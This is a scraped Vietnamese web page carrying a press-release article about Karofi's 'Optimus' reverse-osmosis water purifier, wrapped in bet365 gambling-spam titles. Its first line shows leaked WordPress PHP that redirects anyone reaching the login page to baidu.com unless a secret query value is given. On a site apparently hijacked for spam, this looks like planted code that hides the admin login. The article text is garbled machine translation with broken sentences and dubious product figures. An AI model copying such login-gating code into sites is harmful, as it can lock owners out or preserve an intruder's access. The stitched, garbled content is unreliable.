//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Karofi ra mắt sản phẩm mới mang tên "Captain Optimus" | bet365 việt nam_địa chỉ liên kết bet365_cách vào bet365

Karofi ra mắt sản phẩm mới mang tên “Captain Optimus”

Các fan của loạt phim “Transformers” vô cùng ngưỡng mộ nhân vật thuyền trưởng Optimus Prime. Máy lọc nước thông minh Karofi Optimus thế hệ mới được lấy cảm hứng từ tính cách tiên phong của người đội trưởng Optimus Prime, dẫn dắt đồng đội đánh bại cái ác, bảo vệ cuộc sống của người dân, hãng có nhiều lợi thế trong ngành. Công nghệ lọc nước và thiết kế khoa học thông minh mang đến nguồn nước an toàn đảm bảo sức khỏe cho người sử dụng.

Khác với các sản phẩm Karofi trước đây, Optimus được cải tiến về ngoại hình thông qua sự kết hợp giữa hai màu đen và trắng, dải màu thể hiện sự tinh tế và cao cấp. Vẻ ngoài của sản phẩm tạo cho người nhìn ấn tượng về sự sang trọng và lịch lãm, giống như một vật trang trí nhà cửa hiện đại hơn là một chiếc máy lọc nước mà người tiêu dùng thường đặt trong gian bếp. .

Máy lọc nước Optimus mới nhất của Karofi.

Optimus kế thừa những ưu điểm vượt trội của máy lọc nước thông minh thương hiệu Karofi, tiếp tục được trang bị màn hình hiển thị chỉ số TDS (tổng hàm lượng chất rắn hòa tan). Water), cảnh báo mọi nguy cơ như cấp nước kém, thay lõi nghiêm trọng, rò rỉ nước …—— Cảm giác khi chạm vào sản phẩm Optimus với cấu trúc khoa học sang trọng. Karofi cũng đầu tư sử dụng màng Aquaast màng nổi bật của Dow Chemical. Màng thẩm thấu ngược thông thường chỉ có tỷ lệ thoát nước khoảng 40% và 60% đối với nước tinh khiết. Sau đó, sử dụng màng lọc Ro Aqualast của Karofi cho Optimus, tỷ lệ thu hồi nước tinh khiết có thể đạt 70%. Ngoài ra, lớp màng này có thể tăng gấp đôi tuổi thọ và có thể xử lý nhiều nguồn nước, chẳng hạn như nước máy, nước giếng, nước lợ hoặc nước có chỉ số TDS lên đến 3000 ppm. Hiệu quả như màng thẩm thấu ngược truyền thống.

Với nhiều ưu điểm vượt trội, máy lọc nước Karofi Optimus được kỳ vọng sẽ trở thành sản phẩm được ưa chuộng tại hơn 6000 địa điểm. Doanh số bán hàng trên Karofi. Trên toàn quốc, tiếp tục giữ vững vị thế dẫn đầu thị trường ngành lọc nước Việt Nam.

Karofi là thương hiệu chuyên cung cấp các giải pháp lọc nước, trong số đó, máy lọc nước RO Karofi và thiết bị nước nóng lạnh không chỉ là hai dòng sản phẩm được một triệu gia đình Việt tin dùng. Đăng ký tại đây hoặc qua hotline 1900 6418 để trải nghiệm máy lọc nước Karofi Optimus .

(Nguồn: Karofi)

Leave a comment

bet365 việt nam_địa chỉ liên kết bet365_cách vào bet365